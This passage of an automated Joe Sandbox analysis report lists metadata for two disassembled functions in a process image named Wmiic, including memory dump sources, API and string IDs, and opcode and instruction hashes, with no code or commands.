                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Source$DeregisterRegisterReport_snwprintf_s
                                                                                                                                                                                                    • String ID: %s%s$set_createfile_parameter()
                                                                                                                                                                                                    • API String ID: 3081108292-102671490
                                                                                                                                                                                                    • Opcode ID: db437f29594db4c845281d8ab962dddfa93ab2c9490456a63c896ed5cf6eaedd
                                                                                                                                                                                                    • Instruction ID: 36db2d84d5898f6ff56e4daee3153183d4249f022df8d192bd57ebdc47628223
                                                                                                                                                                                                    • Opcode Fuzzy Hash: db437f29594db4c845281d8ab962dddfa93ab2c9490456a63c896ed5cf6eaedd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1101B172614A8042F622DB16F851BDA6354BB8C7E4F540325BFAC477E5DF38C50A8740
                                                                                                                                                                                                    Function 00000001400250EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 3186804695-1018135373
                                                                                                                                                                                                    • Opcode ID: f518a2f01546b2857537e82e835672f00eb15f2ecaa500e75dd14d18472aae28
                                                                                                                                                                                                    • Instruction ID: 3abc21f0dc36ef9efe3608e6f583550ad69bd6604c7f8c9ada24669edb6f4e5a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f518a2f01546b2857537e82e835672f00eb15f2ecaa500e75dd14d18472aae28
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 480152322416418ADB72AF23C8503EC23A4E79DBCAF894129EF8D0B7A5DB31C994C305